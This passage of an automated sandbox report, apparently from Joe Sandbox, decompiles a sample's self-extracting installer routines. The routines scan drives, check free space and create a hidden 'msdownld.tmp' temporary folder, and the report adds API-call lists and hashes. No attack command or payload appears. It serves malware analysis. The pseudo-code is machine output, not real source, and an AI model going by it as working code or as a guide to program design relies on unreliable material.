                                                                                                                                                                                                    									if(_t40 == 0) {
                                                                                                                                                                                                    										L19:
                                                                                                                                                                                                    										_push(_t82);
                                                                                                                                                                                                    										E00391781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                    										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                    										if(_v268 <= 0x5a) {
                                                                                                                                                                                                    											do {
                                                                                                                                                                                                    												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                    												__eflags = _t109 - 6;
                                                                                                                                                                                                    												if(_t109 == 6) {
                                                                                                                                                                                                    													L22:
                                                                                                                                                                                                    													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                    													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                    													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                    														goto L30;
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														goto L23;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													__eflags = _t109 - 3;
                                                                                                                                                                                                    													if(_t109 != 3) {
                                                                                                                                                                                                    														L23:
                                                                                                                                                                                                    														__eflags = _t109 - 2;
                                                                                                                                                                                                    														if(_t109 != 2) {
                                                                                                                                                                                                    															L28:
                                                                                                                                                                                                    															_t66 = _v268;
                                                                                                                                                                                                    															goto L29;
                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                    															_t66 = _v268;
                                                                                                                                                                                                    															__eflags = _t66 - 0x41;
                                                                                                                                                                                                    															if(_t66 == 0x41) {
                                                                                                                                                                                                    																L29:
                                                                                                                                                                                                    																_t60 = _t66 + 1;
                                                                                                                                                                                                    																_v268 = _t60;
                                                                                                                                                                                                    																goto L42;
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																__eflags = _t66 - 0x42;
                                                                                                                                                                                                    																if(_t66 == 0x42) {
                                                                                                                                                                                                    																	goto L29;
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	_t68 = E00396952( &_v268);
                                                                                                                                                                                                    																	__eflags = _t68;
                                                                                                                                                                                                    																	if(_t68 == 0) {
                                                                                                                                                                                                    																		goto L28;
                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                    																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                    																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                    																			L30:
                                                                                                                                                                                                    																			_push(0);
                                                                                                                                                                                                    																			_t103 = 3;
                                                                                                                                                                                                    																			_t49 = E0039597D( &_v268, _t103, 1);
                                                                                                                                                                                                    																			__eflags = _t49;
                                                                                                                                                                                                    																			if(_t49 != 0) {
                                                                                                                                                                                                    																				L33:
                                                                                                                                                                                                    																				_t50 = E00392630(0,  &_v268, 1);
                                                                                                                                                                                                    																				__eflags = _t50;
                                                                                                                                                                                                    																				if(_t50 != 0) {
                                                                                                                                                                                                    																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                    																				}
                                                                                                                                                                                                    																				_t88 =  &_v268;
                                                                                                                                                                                                    																				E0039658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                    																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                    																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                    																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                    																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                    																					__eflags = _t54;
                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                    																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                    																				}
                                                                                                                                                                                                    																				__eflags = _t54;
                                                                                                                                                                                                    																				if(_t54 != 0) {
                                                                                                                                                                                                    																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                    																					_push(_t88);
                                                                                                                                                                                                    																					_t109 = 0x3991e4;
                                                                                                                                                                                                    																					E00391781(0x3991e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                    																					_t101 = 1;
                                                                                                                                                                                                    																					_t59 = E00395467(0x3991e4, 1, 0);
                                                                                                                                                                                                    																					__eflags = _t59;
                                                                                                                                                                                                    																					if(_t59 != 0) {
                                                                                                                                                                                                    																						goto L45;
                                                                                                                                                                                                    																					} else {
                                                                                                                                                                                                    																						_t60 = _v268;
                                                                                                                                                                                                    																						goto L42;
                                                                                                                                                                                                    																					}
                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                    																					_t60 = _v268 + 1;
                                                                                                                                                                                                    																					_v265 = 0;
                                                                                                                                                                                                    																					_v268 = _t60;
                                                                                                                                                                                                    																					goto L42;
                                                                                                                                                                                                    																				}
                                                                                                                                                                                                    																			} else {
                                                                                                                                                                                                    																				_t65 = E00392630(0,  &_v268, 1);
                                                                                                                                                                                                    																				__eflags = _t65;
                                                                                                                                                                                                    																				if(_t65 != 0) {
                                                                                                                                                                                                    																					goto L28;
                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                    																					_t67 = E0039597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                    																					__eflags = _t67;
                                                                                                                                                                                                    																					if(_t67 == 0) {
                                                                                                                                                                                                    																						goto L28;
                                                                                                                                                                                                    																					} else {
                                                                                                                                                                                                    																						goto L33;
                                                                                                                                                                                                    																					}
                                                                                                                                                                                                    																				}
                                                                                                                                                                                                    																			}
                                                                                                                                                                                                    																		} else {
                                                                                                                                                                                                    																			goto L28;
                                                                                                                                                                                                    																		}
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														goto L22;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												goto L47;
                                                                                                                                                                                                    												L42:
                                                                                                                                                                                                    												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                    											} while (_t60 <= 0x5a);
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										goto L43;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t101 = 1;
                                                                                                                                                                                                    										_t69 = E00395467(0x3991e4, 1, 3); // executed
                                                                                                                                                                                                    										__eflags = _t69;
                                                                                                                                                                                                    										if(_t69 != 0) {
                                                                                                                                                                                                    											goto L45;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											_t82 = 0x3991e4;
                                                                                                                                                                                                    											_t70 = E00392630(0, 0x3991e4, 1);
                                                                                                                                                                                                    											__eflags = _t70;
                                                                                                                                                                                                    											if(_t70 != 0) {
                                                                                                                                                                                                    												goto L19;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												_t101 = 1;
                                                                                                                                                                                                    												_t82 = 0x3991e4;
                                                                                                                                                                                                    												_t71 = E00395467(0x3991e4, 1, 1);
                                                                                                                                                                                                    												__eflags = _t71;
                                                                                                                                                                                                    												if(_t71 != 0) {
                                                                                                                                                                                                    													goto L45;
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													do {
                                                                                                                                                                                                    														goto L19;
                                                                                                                                                                                                    														L43:
                                                                                                                                                                                                    														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                    														_push(4);
                                                                                                                                                                                                    														_t101 = 3;
                                                                                                                                                                                                    														_t82 =  &_v268;
                                                                                                                                                                                                    														_t44 = E0039597D(_t82, _t101, 1);
                                                                                                                                                                                                    														__eflags = _t44;
                                                                                                                                                                                                    													} while (_t44 != 0);
                                                                                                                                                                                                    													goto L2;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                    							if(_t35 != 0x5c) {
                                                                                                                                                                                                    								L10:
                                                                                                                                                                                                    								_t72 = 1;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								__eflags =  *0x398b3f - _t35; // 0x0
                                                                                                                                                                                                    								_t72 = 0;
                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                    									goto L10;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t101 = 0;
                                                                                                                                                                                                    							_t73 = E00395467(0x398b3e, 0, _t72);
                                                                                                                                                                                                    							__eflags = _t73;
                                                                                                                                                                                                    							if(_t73 != 0) {
                                                                                                                                                                                                    								L45:
                                                                                                                                                                                                    								_t38 = 1;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t101 = 0x4be;
                                                                                                                                                                                                    								E003944B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                    								goto L2;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t101 = 0x4b1;
                                                                                                                                                                                                    						E003944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						LocalFree(_t109);
                                                                                                                                                                                                    						 *0x399124 = 0x80070714;
                                                                                                                                                                                                    						goto L2;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t101 = 0x4b5;
                                                                                                                                                                                                    					E003944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					 *0x399124 = E00396285();
                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                    					_t38 = 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				L47:
                                                                                                                                                                                                    				return E00396CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                    			}





































                                                                                                                                                                                                    0x003955ab
                                                                                                                                                                                                    0x003955b2
                                                                                                                                                                                                    0x003955c9
                                                                                                                                                                                                    0x003955d5
                                                                                                                                                                                                    0x003955d9
                                                                                                                                                                                                    0x00395600
                                                                                                                                                                                                    0x00395605
                                                                                                                                                                                                    0x0039560a
                                                                                                                                                                                                    0x0039560c
                                                                                                                                                                                                    0x00395638
                                                                                                                                                                                                    0x00395641
                                                                                                                                                                                                    0x00395643
                                                                                                                                                                                                    0x00395645
                                                                                                                                                                                                    0x00395645
                                                                                                                                                                                                    0x0039564c
                                                                                                                                                                                                    0x00395652
                                                                                                                                                                                                    0x00395657
                                                                                                                                                                                                    0x00395659
                                                                                                                                                                                                    0x00395696
                                                                                                                                                                                                    0x0039569c
                                                                                                                                                                                                    0x0039589f
                                                                                                                                                                                                    0x003958a7
                                                                                                                                                                                                    0x003958ac
                                                                                                                                                                                                    0x003958b3
                                                                                                                                                                                                    0x003958b5
                                                                                                                                                                                                    0x003956a2
                                                                                                                                                                                                    0x003956a2
                                                                                                                                                                                                    0x003956a8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003956ae
                                                                                                                                                                                                    0x003956ae
                                                                                                                                                                                                    0x003956b9
                                                                                                                                                                                                    0x003956bf
                                                                                                                                                                                                    0x003956c1
                                                                                                                                                                                                    0x003956f3
                                                                                                                                                                                                    0x003956f3
                                                                                                                                                                                                    0x00395705
                                                                                                                                                                                                    0x0039570a
                                                                                                                                                                                                    0x00395711
                                                                                                                                                                                                    0x00395717
                                                                                                                                                                                                    0x00395724
                                                                                                                                                                                                    0x00395726
                                                                                                                                                                                                    0x00395729
                                                                                                                                                                                                    0x00395730
                                                                                                                                                                                                    0x00395737
                                                                                                                                                                                                    0x0039573d
                                                                                                                                                                                                    0x00395740
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039572b
                                                                                                                                                                                                    0x0039572b
                                                                                                                                                                                                    0x0039572e
                                                                                                                                                                                                    0x00395742
                                                                                                                                                                                                    0x00395742
                                                                                                                                                                                                    0x00395745
                                                                                                                                                                                                    0x0039576b
                                                                                                                                                                                                    0x0039576b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395747
                                                                                                                                                                                                    0x00395747
                                                                                                                                                                                                    0x0039574d
                                                                                                                                                                                                    0x0039574f
                                                                                                                                                                                                    0x00395771
                                                                                                                                                                                                    0x00395771
                                                                                                                                                                                                    0x00395773
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395751
                                                                                                                                                                                                    0x00395751
                                                                                                                                                                                                    0x00395753
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395755
                                                                                                                                                                                                    0x0039575b
                                                                                                                                                                                                    0x00395760
                                                                                                                                                                                                    0x00395762
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395764
                                                                                                                                                                                                    0x00395764
                                                                                                                                                                                                    0x00395769
                                                                                                                                                                                                    0x0039577e
                                                                                                                                                                                                    0x0039577e
                                                                                                                                                                                                    0x00395781
                                                                                                                                                                                                    0x00395788
                                                                                                                                                                                                    0x0039578d
                                                                                                                                                                                                    0x0039578f
                                                                                                                                                                                                    0x003957b2
                                                                                                                                                                                                    0x003957b8
                                                                                                                                                                                                    0x003957bd
                                                                                                                                                                                                    0x003957bf
                                                                                                                                                                                                    0x003957cd
                                                                                                                                                                                                    0x003957cd
                                                                                                                                                                                                    0x003957dd
                                                                                                                                                                                                    0x003957e3
                                                                                                                                                                                                    0x003957ef
                                                                                                                                                                                                    0x003957f5
                                                                                                                                                                                                    0x003957f8
                                                                                                                                                                                                    0x0039580a
                                                                                                                                                                                                    0x0039580a
                                                                                                                                                                                                    0x003957fa
                                                                                                                                                                                                    0x00395802
                                                                                                                                                                                                    0x00395802
                                                                                                                                                                                                    0x0039580d
                                                                                                                                                                                                    0x0039580f
                                                                                                                                                                                                    0x00395830
                                                                                                                                                                                                    0x00395836
                                                                                                                                                                                                    0x0039583d
                                                                                                                                                                                                    0x0039584b
                                                                                                                                                                                                    0x00395851
                                                                                                                                                                                                    0x00395855
                                                                                                                                                                                                    0x0039585a
                                                                                                                                                                                                    0x0039585c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039585e
                                                                                                                                                                                                    0x0039585e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039585e
                                                                                                                                                                                                    0x00395811
                                                                                                                                                                                                    0x00395817
                                                                                                                                                                                                    0x00395819
                                                                                                                                                                                                    0x0039581f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039581f
                                                                                                                                                                                                    0x00395791
                                                                                                                                                                                                    0x00395797
                                                                                                                                                                                                    0x0039579c
                                                                                                                                                                                                    0x0039579e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003957a0
                                                                                                                                                                                                    0x003957a9
                                                                                                                                                                                                    0x003957ae
                                                                                                                                                                                                    0x003957b0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003957b0
                                                                                                                                                                                                    0x0039579e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395769
                                                                                                                                                                                                    0x00395762
                                                                                                                                                                                                    0x00395753
                                                                                                                                                                                                    0x0039574f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039572e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395864
                                                                                                                                                                                                    0x00395864
                                                                                                                                                                                                    0x00395864
                                                                                                                                                                                                    0x00395717
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003956c3
                                                                                                                                                                                                    0x003956c5
                                                                                                                                                                                                    0x003956c9
                                                                                                                                                                                                    0x003956ce
                                                                                                                                                                                                    0x003956d0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003956d6
                                                                                                                                                                                                    0x003956d6
                                                                                                                                                                                                    0x003956d8
                                                                                                                                                                                                    0x003956dd
                                                                                                                                                                                                    0x003956df
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003956e1
                                                                                                                                                                                                    0x003956e2
                                                                                                                                                                                                    0x003956e4
                                                                                                                                                                                                    0x003956e6
                                                                                                                                                                                                    0x003956eb
                                                                                                                                                                                                    0x003956ed
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003956f3
                                                                                                                                                                                                    0x003956f3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039586c
                                                                                                                                                                                                    0x00395878
                                                                                                                                                                                                    0x0039587e
                                                                                                                                                                                                    0x00395882
                                                                                                                                                                                                    0x00395883
                                                                                                                                                                                                    0x00395889
                                                                                                                                                                                                    0x0039588e
                                                                                                                                                                                                    0x0039588e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395896
                                                                                                                                                                                                    0x003956ed
                                                                                                                                                                                                    0x003956df
                                                                                                                                                                                                    0x003956d0
                                                                                                                                                                                                    0x003956c1
                                                                                                                                                                                                    0x003956a8
                                                                                                                                                                                                    0x0039565b
                                                                                                                                                                                                    0x0039565b
                                                                                                                                                                                                    0x0039565d
                                                                                                                                                                                                    0x00395669
                                                                                                                                                                                                    0x00395669
                                                                                                                                                                                                    0x0039565f
                                                                                                                                                                                                    0x0039565f
                                                                                                                                                                                                    0x00395665
                                                                                                                                                                                                    0x00395667
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395667
                                                                                                                                                                                                    0x0039566c
                                                                                                                                                                                                    0x00395673
                                                                                                                                                                                                    0x00395678
                                                                                                                                                                                                    0x0039567a
                                                                                                                                                                                                    0x0039589b
                                                                                                                                                                                                    0x0039589b
                                                                                                                                                                                                    0x00395680
                                                                                                                                                                                                    0x00395685
                                                                                                                                                                                                    0x0039568c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039568c
                                                                                                                                                                                                    0x0039567a
                                                                                                                                                                                                    0x0039560e
                                                                                                                                                                                                    0x00395613
                                                                                                                                                                                                    0x0039561a
                                                                                                                                                                                                    0x00395620
                                                                                                                                                                                                    0x00395626
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395626
                                                                                                                                                                                                    0x003955db
                                                                                                                                                                                                    0x003955e0
                                                                                                                                                                                                    0x003955e7
                                                                                                                                                                                                    0x003955f1
                                                                                                                                                                                                    0x003955f6
                                                                                                                                                                                                    0x003955f6
                                                                                                                                                                                                    0x003955f6
                                                                                                                                                                                                    0x003958b7
                                                                                                                                                                                                    0x003958c7

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0039468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946A0
                                                                                                                                                                                                      • Part of subcall function 0039468F: SizeofResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946A9
                                                                                                                                                                                                      • Part of subcall function 0039468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946C3
                                                                                                                                                                                                      • Part of subcall function 0039468F: LoadResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946CC
                                                                                                                                                                                                      • Part of subcall function 0039468F: LockResource.KERNEL32(00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946D3
                                                                                                                                                                                                      • Part of subcall function 0039468F: memcpy_s.MSVCRT ref: 003946E5
                                                                                                                                                                                                      • Part of subcall function 0039468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003946EF
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 003955CF
                                                                                                                                                                                                    • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00395638
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 0039564C
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00395620
                                                                                                                                                                                                      • Part of subcall function 003944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00394518
                                                                                                                                                                                                      • Part of subcall function 003944B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00394554
                                                                                                                                                                                                      • Part of subcall function 00396285: GetLastError.KERNEL32(00395BBC), ref: 00396285
                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 003956B9
                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0039571E
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00395737
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 003957CD
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 003957EF
                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00395802
                                                                                                                                                                                                      • Part of subcall function 00392630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00392654
                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00395830
                                                                                                                                                                                                      • Part of subcall function 00396517: FindResourceA.KERNEL32(00390000,000007D6,00000005), ref: 0039652A
                                                                                                                                                                                                      • Part of subcall function 00396517: LoadResource.KERNEL32(00390000,00000000,?,?,00392EE8,00000000,003919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00396538
                                                                                                                                                                                                      • Part of subcall function 00396517: DialogBoxIndirectParamA.USER32(00390000,00000000,00000547,003919E0,00000000), ref: 00396557
                                                                                                                                                                                                      • Part of subcall function 00396517: FreeResource.KERNEL32(00000000,?,?,00392EE8,00000000,003919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00396560
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00395878
                                                                                                                                                                                                      • Part of subcall function 0039597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 003959A8
                                                                                                                                                                                                      • Part of subcall function 0039597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 003959AF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                    • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                    • API String ID: 2436801531-337015389
                                                                                                                                                                                                    • Opcode ID: 05ea4bd5fb37a57994bb2724c6b2240d3fc318c34556bd72c4d4f37fb3cde1a3
                                                                                                                                                                                                    • Instruction ID: 14e1029e97412e03a68a1bf1a10bcca8519ce1e166bfaa7132ed33dc6bf97f8f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05ea4bd5fb37a57994bb2724c6b2240d3fc318c34556bd72c4d4f37fb3cde1a3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E815871B09A059ADF23AB749C85BFE726D9B61300F0501A6F986E6191EFB08EC18B50
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 324 39597d-3959b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 3959bb-3959d8 call 3944b9 call 396285 324->325 326 3959dd-395a1b GetDiskFreeSpaceA 324->326 341 395c05-395c14 call 396ce0 325->341 327 395ba1-395bde memset call 396285 GetLastError FormatMessageA 326->327 328 395a21-395a4a MulDiv 326->328 338 395be3-395bfc call 3944b9 SetCurrentDirectoryA 327->338 328->327 332 395a50-395a6c GetVolumeInformationA 328->332 335 395a6e-395ab0 memset call 396285 GetLastError FormatMessageA 332->335 336 395ab5-395aca SetCurrentDirectoryA 332->336 335->338 340 395acc-395ad1 336->340 352 395c02 338->352 344 395ad3-395ad8 340->344 345 395ae2-395ae4 340->345 344->345 347 395ada-395ae0 344->347 349 395ae7-395af8 345->349 350 395ae6 345->350 347->340 347->345 351 395af9-395afb 349->351 350->349 354 395afd-395b03 351->354 355 395b05-395b08 351->355 356 395c04 352->356 354->351 354->355 357 395b0a-395b1b call 3944b9 355->357 358 395b20-395b27 355->358 356->341 357->352 360 395b29-395b33 358->360 361 395b52-395b5b 358->361 360->361 363 395b35-395b50 360->363 364 395b62-395b6d 361->364 363->364 365 395b6f-395b74 364->365 366 395b76-395b7d 364->366 367 395b85 365->367 368 395b7f-395b81 366->368 369 395b83 366->369 370 395b87-395b94 call 39268b 367->370 371 395b96-395b9f 367->371 368->367 369->367 370->356 371->356
                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                    			E0039597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                    				char _v276;
                                                                                                                                                                                                    				char _v788;
                                                                                                                                                                                                    				long _v792;
                                                                                                                                                                                                    				long _v796;
                                                                                                                                                                                                    				long _v800;
                                                                                                                                                                                                    				signed int _v804;
                                                                                                                                                                                                    				long _v808;
                                                                                                                                                                                                    				int _v812;
                                                                                                                                                                                                    				long _v816;
                                                                                                                                                                                                    				long _v820;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t46;
                                                                                                                                                                                                    				int _t50;
                                                                                                                                                                                                    				signed int _t55;
                                                                                                                                                                                                    				void* _t66;
                                                                                                                                                                                                    				int _t69;
                                                                                                                                                                                                    				signed int _t73;
                                                                                                                                                                                                    				signed short _t78;
                                                                                                                                                                                                    				signed int _t87;
                                                                                                                                                                                                    				signed int _t101;
                                                                                                                                                                                                    				int _t102;
                                                                                                                                                                                                    				unsigned int _t103;
                                                                                                                                                                                                    				unsigned int _t105;
                                                                                                                                                                                                    				signed int _t111;
                                                                                                                                                                                                    				long _t112;
                                                                                                                                                                                                    				signed int _t116;
                                                                                                                                                                                                    				CHAR* _t118;
                                                                                                                                                                                                    				signed int _t119;
                                                                                                                                                                                                    				signed int _t120;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t114 = __edi;
                                                                                                                                                                                                    				_t46 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                    				_v804 = __edx;
                                                                                                                                                                                                    				_t118 = __ecx;
                                                                                                                                                                                                    				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                    				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                    				if(_t50 != 0) {
                                                                                                                                                                                                    					_push(__edi);
                                                                                                                                                                                                    					_v796 = 0;
                                                                                                                                                                                                    					_v792 = 0;
                                                                                                                                                                                                    					_v800 = 0;
                                                                                                                                                                                                    					_v808 = 0;
                                                                                                                                                                                                    					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                    					__eflags = _t55;
                                                                                                                                                                                                    					if(_t55 == 0) {
                                                                                                                                                                                                    						L29:
                                                                                                                                                                                                    						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                    						 *0x399124 = E00396285();
                                                                                                                                                                                                    						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                    						_t110 = 0x4b0;
                                                                                                                                                                                                    						L30:
                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                    						E003944B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                    						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                    						L31:
                                                                                                                                                                                                    						_t66 = 0;
                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                    						L32:
                                                                                                                                                                                                    						_pop(_t114);
                                                                                                                                                                                                    						goto L33;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t69 = _v792 * _v796;
                                                                                                                                                                                                    					_v812 = _t69;
                                                                                                                                                                                                    					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                    					__eflags = _t116;
                                                                                                                                                                                                    					if(_t116 == 0) {
                                                                                                                                                                                                    						goto L29;
                                                                                                                                                                                                    					}
